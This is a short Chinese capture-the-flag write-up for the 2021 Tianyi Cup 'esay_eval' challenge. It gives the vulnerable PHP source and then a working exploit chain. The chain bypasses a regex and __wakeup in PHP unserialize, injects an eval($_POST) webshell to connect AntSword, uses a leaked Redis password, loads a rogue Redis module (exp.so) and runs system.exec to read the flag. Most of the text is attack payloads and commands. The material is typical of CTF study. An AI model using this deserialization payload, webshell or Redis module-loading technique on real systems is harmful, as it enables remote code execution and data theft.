[天翼杯 2021]esay_eval
<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);
}
function __wakeup(){
$this->code = "";
}
}
class B{
function __destruct(){
echo $this->a->a();
}
}
if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);//要求A,B后面匹配1,但是对大小写不敏感可以用a,b绕过,
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);
}
}else{
highlight_file(__FILE__);
}
poc:
<?php
class a{
public $code = "";
function __construct(){
$this->code = "phpinfo();";
}
}
class b{
function __construct(){
$this->a=new a();
}
}
echo serialize(new b());
?>//php对类名大小写不敏感
//O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}
//改为O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}即可绕过匹配和__wakeup()
发现禁用了许多函数
写马蚁剑连
?poc=O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:16:"eval($_POST[1]);";}}
发现
redis密码:you_cannot_guess_it redis
管理插件(蚁剑): git clone https://github.com/Medicean/AS_Redis.git
恶意exp: git clone https://github.com/Dliv3/redis-rogue-server.git
- 上传exp.so到/var/www/html下
- 连接redis执行命令 MODULE LOAD “/var/www/html/exp.so”
- RCE: system.exec “cat /f*”
记得刷新Redis